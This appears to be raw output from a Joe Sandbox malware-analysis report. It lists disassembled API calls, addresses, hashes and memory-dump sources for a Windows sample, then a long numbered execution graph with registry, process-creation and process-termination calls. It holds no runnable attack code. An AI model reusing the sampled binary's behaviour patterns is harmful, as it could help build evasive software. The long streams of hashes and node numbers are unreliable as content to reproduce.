                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                              APIs
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?), ref: 004029BC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseValuelstrlenwvsprintf
                                                                                              • String ID: WriteRegStr: "%s\%s" "%s"="%s"
                                                                                              • API String ID: 110681785-1479857800
                                                                                              • Opcode ID: ceeba1b9d16ba188b1c7e3542d18256d43eda57c698e5a738710fe5a87838eab
                                                                                              • Instruction ID: 2b9f8284b9038a4b98bbba7bd707b13acd62d431aca27cfa06a0d06d9f7b79f4
                                                                                              • Opcode Fuzzy Hash: ceeba1b9d16ba188b1c7e3542d18256d43eda57c698e5a738710fe5a87838eab
                                                                                              • Instruction Fuzzy Hash: 30F03AB2A04108EFCF12DF95DF4999EBB32EB50345F204076E106B00A1D27A4E12EB5A
                                                                                              APIs
                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                              • String ID: !N~
                                                                                              • API String ID: 623250636-529124213
                                                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3509786178-2769509956
                                                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:2.4%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:113
                                                                                              execution_graph 98028 f9107d 98033 fa2fc5 98028->98033 98030 f9108c 98064 fb2f70 98030->98064 98034 fa2fd5 __ftell_nolock 98033->98034 98067 fa1207 98034->98067 98038 fa3094 98079 fb08c1 98038->98079 98045 fa1207 59 API calls 98046 fa30c5 98045->98046 98098 fa19e1 98046->98098 98048 fa30ce RegOpenKeyExW 98049 fe01a3 RegQueryValueExW 98048->98049 98053 fa30f0 Mailbox 98048->98053 98050 fe0235 RegCloseKey 98049->98050 98051 fe01c0 98049->98051 98050->98053 98062 fe0247 _wcscat Mailbox __wsetenvp 98050->98062 98102 fb0fe6 98051->98102 98053->98030 98054 fe01d9 98112 fa433f 98054->98112 98057 fe0201 98115 fa1821 98057->98115 98059 fe021b 98059->98050 98061 fa4c94 59 API calls 98061->98062 98062->98053 98062->98061 98063 fa1609 59 API calls 98062->98063 98124 fa1a36 98062->98124 98063->98062 98195 fb2e74 98064->98195 98066 f91096 98068 fb0fe6 Mailbox 59 API calls 98067->98068 98069 fa1228 98068->98069 98070 fb0fe6 Mailbox 59 API calls 98069->98070 98071 fa1236 98070->98071 98072 fb00cf 98071->98072 98128 fc1b70 98072->98128 98075 fa1a36 59 API calls 98076 fb0102 98075->98076 98130 fb0284 98076->98130 98078 fb010c Mailbox 98078->98038 98080 fc1b70 __ftell_nolock 98079->98080 98081 fb08ce GetFullPathNameW 98080->98081 98082 fb08f0 98081->98082 98083 fa1821 59 API calls 98082->98083 98084 fa309f 98083->98084 98085 fa1900 98084->98085 98086 fdf534 98085->98086 98087 fa1914 98085->98087 98157 fa1c7e 59 API calls Mailbox 98086->98157 98152 fa18a5 98087->98152 98090 fa191f 98092 fa4c94 98090->98092 98091 fdf53f __wsetenvp _memmove 98093 fa4ca2 98092->98093 98097 fa4cc4 _memmove 98092->98097 98096 fb0fe6 Mailbox 59 API calls 98093->98096 98094 fb0fe6 Mailbox 59 API calls 98095 fa30bc 98094->98095 98095->98045 98096->98097 98097->98094 98099 fa19fb 98098->98099 98101 fa19ee 98098->98101 98100 fb0fe6 Mailbox 59 API calls 98099->98100 98100->98101 98101->98048 98105 fb0fee 98102->98105 98104 fb1008 98104->98054 98105->98104 98107 fb100c std::exception::exception 98105->98107 98159 fb593c 98105->98159 98176 fb35d1 DecodePointer 98105->98176 98177 fb87cb RaiseException 98107->98177 98109 fb1036 98178 fb8701 58 API calls _free 98109->98178 98111 fb1048 98111->98054 98113 fb0fe6 Mailbox 59 API calls 98112->98113 98114 fa4351 RegQueryValueExW 98113->98114 98114->98057 98114->98059 98116 fa189a 98115->98116 98118 fa182d __wsetenvp 98115->98118 98117 fa1981 59 API calls 98116->98117 98123 fa184b _memmove 98117->98123 98119 fa1868 98118->98119 98120 fa1843 98118->98120 98194 fa1c7e 59 API calls Mailbox 98119->98194 98193 fa1b7c 59 API calls Mailbox 98120->98193 98123->98059 98125 fa1a45 __wsetenvp _memmove 98124->98125 98126 fb0fe6 Mailbox 59 API calls 98125->98126 98127 fa1a83 98126->98127 98127->98062 98129 fb00dc GetModuleFileNameW 98128->98129 98129->98075 98131 fc1b70 __ftell_nolock 98130->98131 98132 fb0291 GetFullPathNameW 98131->98132 98133 fb02cd 98132->98133 98134 fb02b0 98132->98134 98136 fa19e1 59 API calls 98133->98136 98135 fa1821 59 API calls 98134->98135 98137 fb02bc 98135->98137 98136->98137 98140 fa133d 98137->98140 98141 fa134b 98140->98141 98144 fa1981 98141->98144 98143 fa135b 98143->98078 98145 fa1998 _memmove 98144->98145 98146 fa198f 98144->98146 98145->98143 98146->98145 98148 fa1aa4 98146->98148 98149 fa1ab7 98148->98149 98151 fa1ab4 _memmove 98148->98151 98150 fb0fe6 Mailbox 59 API calls 98149->98150 98150->98151 98151->98145 98153 fa18b4 __wsetenvp 98152->98153 98154 fa18c5 _memmove 98153->98154 98158 fa1c7e 59 API calls Mailbox 98153->98158 98154->98090 98156 fdf4f1 _memmove 98157->98091 98158->98156 98160 fb59b7 98159->98160 98172 fb5948 98159->98172 98187 fb35d1 DecodePointer 98160->98187 98162 fb59bd 98188 fb8d58 58 API calls __getptd_noexit 98162->98188 98165 fb597b RtlAllocateHeap 98165->98172 98175 fb59af 98165->98175 98167 fb59a3 98185 fb8d58 58 API calls __getptd_noexit 98167->98185 98171 fb5953 98171->98172 98179 fba39b 58 API calls 2 library calls 98171->98179 98180 fba3f8 58 API calls 8 library calls 98171->98180 98181 fb32cf 98171->98181 98172->98165 98172->98167 98172->98171 98173 fb59a1 98172->98173 98184 fb35d1 DecodePointer 98172->98184 98186 fb8d58 58 API calls __getptd_noexit 98173->98186 98175->98105 98176->98105 98177->98109 98178->98111 98179->98171 98180->98171 98189 fb329b GetModuleHandleExW 98181->98189 98184->98172 98185->98173 98186->98175 98187->98162 98188->98175 98190 fb32cb ExitProcess 98189->98190 98191 fb32b4 GetProcAddress 98189->98191 98191->98190 98192 fb32c6 98191->98192 98192->98190 98193->98123 98194->98123 98196 fb2e80 ___lock_fhandle 98195->98196 98203 fb3447 98196->98203 98202 fb2ea7 ___lock_fhandle 98202->98066 98220 fb9e3b 98203->98220 98205 fb2e89 98206 fb2eb8 DecodePointer DecodePointer 98205->98206 98207 fb2e95 98206->98207 98208 fb2ee5 98206->98208 98217 fb2eb2 98207->98217 98208->98207 98265 fb89d4 59 API calls __ftell_nolock 98208->98265 98210 fb2f48 EncodePointer EncodePointer 98210->98207 98211 fb2f1c 98211->98207 98215 fb2f36 EncodePointer 98211->98215 98267 fb8a94 61 API calls __realloc_crt 98211->98267 98212 fb2ef7 98212->98210 98212->98211 98266 fb8a94 61 API calls __realloc_crt 98212->98266 98215->98210 98216 fb2f30 98216->98207 98216->98215 98268 fb3450 98217->98268 98221 fb9e5f EnterCriticalSection 98220->98221 98222 fb9e4c 98220->98222 98221->98205 98227 fb9ec3 98222->98227 98224 fb9e52 98224->98221 98251 fb32e5 58 API calls 3 library calls 98224->98251 98228 fb9ecf ___lock_fhandle 98227->98228 98229 fb9ed8 98228->98229 98230 fb9ef0 98228->98230 98252 fba39b 58 API calls 2 library calls 98229->98252 98234 fb9f11 ___lock_fhandle 98230->98234 98254 fb8a4d 58 API calls 2 library calls 98230->98254 98232 fb9edd 98253 fba3f8 58 API calls 8 library calls 98232->98253 98234->98224 98236 fb9f05 98238 fb9f1b 98236->98238 98239 fb9f0c 98236->98239 98237 fb9ee4 98240 fb32cf _fast_error_exit 3 API calls 98237->98240 98242 fb9e3b __lock 58 API calls 98238->98242 98255 fb8d58 58 API calls __getptd_noexit 98239->98255 98243 fb9eee 98240->98243 98244 fb9f22 98242->98244 98243->98230 98245 fb9f2f 98244->98245 98246 fb9f47 98244->98246 98256 fba05b InitializeCriticalSectionAndSpinCount 98245->98256 98257 fb2f85 98246->98257 98249 fb9f3b 98263 fb9f63 LeaveCriticalSection _doexit 98249->98263 98252->98232 98253->98237 98254->98236 98255->98234 98256->98249 98258 fb2fb7 __dosmaperr 98257->98258 98259 fb2f8e RtlFreeHeap 98257->98259 98258->98249 98259->98258 98260 fb2fa3 98259->98260 98264 fb8d58 58 API calls __getptd_noexit 98260->98264 98262 fb2fa9 GetLastError 98262->98258 98263->98234 98264->98262 98265->98212 98266->98211 98267->98216 98271 fb9fa5 LeaveCriticalSection 98268->98271 98270 fb2eb7 98270->98202 98271->98270 98272 fd01f8 98273 fd01fa 98272->98273 98276 ff4d18 SHGetFolderPathW 98273->98276 98277 fa1821 59 API calls 98276->98277 98278 fd0203 98277->98278 98279 f91055 98284 f92a19 98279->98284 98282 fb2f70 __cinit 67 API calls 98283 f91064 98282->98283 98285 fa1207 59 API calls 98284->98285 98286 f92a87 98285->98286 98291 f91256 98286->98291 98289 f92b24 98290 f9105a 98289->98290 98294 f913f8 59 API calls 2 library calls 98289->98294 98290->98282 98295 f91284 98291->98295 98294->98289 98296 f91291 98295->98296 98297 f91275 98295->98297 98296->98297 98298 f91298 RegOpenKeyExW 98296->98298 98297->98289 98298->98297 98299 f912b2 RegQueryValueExW 98298->98299 98300 f912e8 RegCloseKey 98299->98300 98301 f912d3 98299->98301 98300->98297 98301->98300 98302 f95ff5 98326 f95ede Mailbox _memmove 98302->98326 98303 fb0fe6 59 API calls Mailbox 98303->98326 98304 f96a9b 98466 f9a9de 266 API calls 98304->98466 98307 fceff9 98482 f95190 59 API calls Mailbox 98307->98482 98309 fcf007 98483 ffa48d 89 API calls 4 library calls 98309->98483 98313 fcefeb 98358 f95569 Mailbox 98313->98358 98481 fe6cf1 59 API calls Mailbox 98313->98481 98314 f960e5 98315 fce137 98314->98315 98325 f963bd Mailbox 98314->98325 98330 f96abc 98314->98330 98344 f96152 Mailbox 98314->98344 98315->98325 98467 fe7aad 59 API calls 98315->98467 98318 fb0fe6 Mailbox 59 API calls 98322 f963d1 98318->98322 98319 fa1a36 59 API calls 98319->98326 98324 f963de 98322->98324 98322->98330 98328 f96413 98324->98328 98329 fce172 98324->98329 98325->98318 98333 f96426 98325->98333 98326->98303 98326->98304 98326->98307 98326->98309 98326->98314 98326->98319 98326->98330 98326->98358 98367 f953b0 98326->98367 98422 100c355 98326->98422 98465 f9523c 59 API calls 98326->98465 98470 fa1c9c 98326->98470 98474 ff7f11 59 API calls Mailbox 98326->98474 98475 fe6cf1 59 API calls Mailbox 98326->98475 98328->98333 98359 f95447 Mailbox 98328->98359 98468 100c87c 85 API calls 2 library calls 98329->98468 98480 ffa48d 89 API calls 4 library calls 98330->98480 98469 100c9c9 95 API calls Mailbox 98333->98469 98335 fce19d 98335->98335 98337 fcf165 98485 ffa48d 89 API calls 4 library calls 98337->98485 98338 fce691 98477 ffa48d 89 API calls 4 library calls 98338->98477 98339 fb0fe6 59 API calls Mailbox 98339->98359 98341 f969fa 98351 fa1c9c 59 API calls 98341->98351 98344->98313 98344->98330 98348 fce2e9 VariantClear 98344->98348 98344->98358 98395 100e60c 98344->98395 98398 100f1b2 98344->98398 98403 f9cfd7 98344->98403 98464 f95190 59 API calls Mailbox 98344->98464 98476 fe7aad 59 API calls 98344->98476 98345 fa1c9c 59 API calls 98345->98359 98346 fce6a0 98347 fcea9a 98354 fa1c9c 59 API calls 98347->98354 98348->98344 98350 f969ff 98350->98337 98350->98338 98351->98358 98352 fa1207 59 API calls 98352->98359 98354->98358 98355 fceb67 98355->98358 98478 fe7aad 59 API calls 98355->98478 98356 fe7aad 59 API calls 98356->98359 98359->98338 98359->98339 98359->98341 98359->98345 98359->98347 98359->98350 98359->98352 98359->98355 98359->98356 98359->98358 98360 fb2f70 67 API calls __cinit 98359->98360 98361 fcef28 98359->98361 98363 f95a1a 98359->98363 98462 f97e50 266 API calls 2 library calls 98359->98462 98463 f96e30 60 API calls Mailbox 98359->98463 98360->98359 98479 ffa48d 89 API calls 4 library calls 98361->98479 98484 ffa48d 89 API calls 4 library calls 98363->98484 98368 f953cf 98367->98368 98393 f953fd Mailbox 98367->98393 98369 fb0fe6 Mailbox 59 API calls 98368->98369 98369->98393 98370 f969ff 98373 fcf165 98370->98373 98374 fce691 98370->98374 98371 f969fa 98372 fa1c9c 59 API calls 98371->98372 98390 f95569 Mailbox 98372->98390 98492 ffa48d 89 API calls 4 library calls 98373->98492 98488 ffa48d 89 API calls 4 library calls 98374->98488 98375 fb0fe6 59 API calls Mailbox 98375->98393 98379 fa1c9c 59 API calls 98379->98393 98380 fce6a0 98380->98326 98381 fcea9a 98385 fa1c9c 59 API calls 98381->98385 98383 fa1207 59 API calls 98383->98393 98385->98390 98386 fb2f70 67 API calls __cinit 98386->98393 98387 fceb67 98387->98390 98489 fe7aad 59 API calls 98387->98489 98388 fe7aad 59 API calls 98388->98393 98390->98326 98391 fcef28 98490 ffa48d 89 API calls 4 library calls 98391->98490 98393->98370 98393->98371 98393->98374 98393->98375 98393->98379 98393->98381 98393->98383 98393->98386 98393->98387 98393->98388 98393->98390 98393->98391 98394 f95a1a 98393->98394 98486 f97e50 266 API calls 2 library calls 98393->98486 98487 f96e30 60 API calls Mailbox 98393->98487 98491 ffa48d 89 API calls 4 library calls 98394->98491 98493 100d1c6 98395->98493 98397 100e61c 98397->98344 98399 f94d37 84 API calls 98398->98399 98400 100f1cf 98399->98400 98626 ff4148 CreateToolhelp32Snapshot Process32FirstW 98400->98626 98402 100f1de 98402->98344 98404 f94d37 84 API calls 98403->98404 98405 f9d001 98404->98405 98647 f95278 98405->98647 98407 f9d018 98408 f9d57b 98407->98408 98418 f9d439 Mailbox __wsetenvp 98407->98418 98677 f9502b 59 API calls 98407->98677 98408->98344 98412 fb0c65 62 API calls 98412->98418 98414 f94f98 59 API calls 98414->98418 98416 f9502b 59 API calls 98416->98418 98417 f94d37 84 API calls 98417->98418 98418->98408 98418->98412 98418->98414 98418->98416 98418->98417 98419 fa1821 59 API calls 98418->98419 98652 fb312d 98418->98652 98662 fa59d3 98418->98662 98673 fa5ac3 98418->98673 98678 fa162d 98418->98678 98683 fa153b 59 API calls 2 library calls 98418->98683 98684 f94f3c 59 API calls Mailbox 98418->98684 98419->98418 98423 100c380 98422->98423 98424 100c39a 98422->98424 98754 ffa48d 89 API calls 4 library calls 98423->98754 98727 100a8fd 98424->98727 98428 f953b0 265 API calls 98429 100c406 98428->98429 98430 100c498 98429->98430 98433 100c447 98429->98433 98455 100c392 Mailbox 98429->98455 98431 100c4ee 98430->98431 98432 100c49e 98430->98432 98434 f94d37 84 API calls 98431->98434 98431->98455 98755 ff7ed5 59 API calls 98432->98755 98439 ff789a 59 API calls 98433->98439 98435 100c500 98434->98435 98437 fa1aa4 59 API calls 98435->98437 98440 100c524 CharUpperBuffW 98437->98440 98438 100c4c1 98756 fa35b9 59 API calls Mailbox 98438->98756 98442 100c477 98439->98442 98445 100c53e 98440->98445 98444 fe6ebc 265 API calls 98442->98444 98443 100c4c9 Mailbox 98757 f9b020 98443->98757 98444->98455 98446 100c591 98445->98446 98447 100c545 98445->98447 98449 f94d37 84 API calls 98446->98449 98734 ff789a 98447->98734 98450 100c599 98449->98450 98799 f95376 60 API calls 98450->98799 98455->98326 98456 100c5a3 98456->98455 98457 f94d37 84 API calls 98456->98457 98458 100c5be 98457->98458 98800 fa35b9 59 API calls Mailbox 98458->98800 98460 100c5ce 98461 f9b020 265 API calls 98460->98461 98461->98455 98462->98359 98463->98359 98464->98344 98465->98326 98466->98330 98467->98325 98468->98333 98469->98335 98471 fa1caf 98470->98471 98472 fa1ca7 98470->98472 98471->98326 99112 fa1bcc 59 API calls 2 library calls 98472->99112 98474->98326 98475->98326 98476->98344 98477->98346 98478->98358 98479->98363 98480->98313 98481->98358 98482->98313 98483->98313 98484->98358 98485->98358 98486->98393 98487->98393 98488->98380 98489->98390 98490->98394 98491->98390 98492->98390 98531 f94d37 98493->98531 98497 100d617 98600 100dfb1 92 API calls Mailbox 98497->98600 98499 100d24a Mailbox 98499->98397 98501 100d626 98503 100d4b0 98501->98503 98504 100d632 98501->98504 98502 100d29b Mailbox 98502->98499 98505 f94d37 84 API calls 98502->98505 98518 100d4a2 98502->98518 98582 fffc0d 59 API calls 2 library calls 98502->98582 98583 100d6c8 61 API calls 2 library calls 98502->98583 98562 100d057 98503->98562 98504->98499 98505->98502 98510 100d4e9 98577 fb0e38 98510->98577 98513 100d503 98584 ffa48d 89 API calls 4 library calls 98513->98584 98514 100d51c 98585 f947be 98514->98585 98517 100d50e GetCurrentProcess TerminateProcess 98517->98514 98518->98497 98518->98503 98522 100d68d 98522->98499 98526 100d6a1 FreeLibrary 98522->98526 98524 100d554 98597 100dd32 107 API calls _free 98524->98597 98526->98499 98530 100d565 98530->98522 98598 f94230 59 API calls Mailbox 98530->98598 98599 f9523c 59 API calls 98530->98599 98601 100dd32 107 API calls _free 98530->98601 98532 f94d51 98531->98532 98541 f94d4b 98531->98541 98533 f94d99 98532->98533 98534 fcda2f 98532->98534 98535 f94d57 __itow 98532->98535 98536 fcdb28 __i64tow 98532->98536 98602 fb38c8 83 API calls 3 library calls 98533->98602 98542 fb0fe6 Mailbox 59 API calls 98534->98542 98548 fcdaa7 Mailbox _wcscpy 98534->98548 98538 fb0fe6 Mailbox 59 API calls 98535->98538 98536->98536 98540 f94d71 98538->98540 98540->98541 98543 fa1a36 59 API calls 98540->98543 98541->98499 98549 100de8e 98541->98549 98544 fcda74 98542->98544 98543->98541 98545 fb0fe6 Mailbox 59 API calls 98544->98545 98546 fcda9a 98545->98546 98547 fa1a36 59 API calls 98546->98547 98546->98548 98547->98548 98603 fb38c8 83 API calls 3 library calls 98548->98603 98550 fa1aa4 59 API calls 98549->98550 98551 100dea9 CharLowerBuffW 98550->98551 98604 fef903 98551->98604 98555 fa1207 59 API calls 98556 100dee2 98555->98556 98611 fa1462 59 API calls 2 library calls 98556->98611 98558 100def9 98559 fa1981 59 API calls 98558->98559 98560 100df05 Mailbox 98559->98560 98561 100df41 Mailbox 98560->98561 98612 100d6c8 61 API calls 2 library calls 98560->98612 98561->98502 98563 100d0c7 98562->98563 98564 100d072 98562->98564 98568 100e139 98563->98568 98565 fb0fe6 Mailbox 59 API calls 98564->98565 98567 100d094 98565->98567 98566 fb0fe6 Mailbox 59 API calls 98566->98567 98567->98563 98567->98566 98569 100e362 Mailbox 98568->98569 98576 100e15c _strcat _wcscpy __wsetenvp 98568->98576 98569->98510 98570 f95087 59 API calls 98570->98576 98571 f9502b 59 API calls 98571->98576 98572 f950d5 59 API calls 98572->98576 98573 f94d37 84 API calls 98573->98576 98574 fb593c 58 API calls __crtLCMapStringA_stat 98574->98576 98576->98569 98576->98570 98576->98571 98576->98572 98576->98573 98576->98574 98615 ff5e42 61 API calls 2 library calls 98576->98615 98578 fb0e4d 98577->98578 98579 fb0ee5 CreateToolhelp32Snapshot 98578->98579 98580 fb0ed3 CloseHandle 98578->98580 98581 fb0eb3 98578->98581 98579->98581 98580->98581 98581->98513 98581->98514 98582->98502 98583->98502 98584->98517 98586 f947c6 98585->98586 98587 fb0fe6 Mailbox 59 API calls 98586->98587 98588 f947d4 98587->98588 98590 f947e0 98588->98590 98616 f946ec 59 API calls Mailbox 98588->98616 98591 f94540 98590->98591 98617 f94650 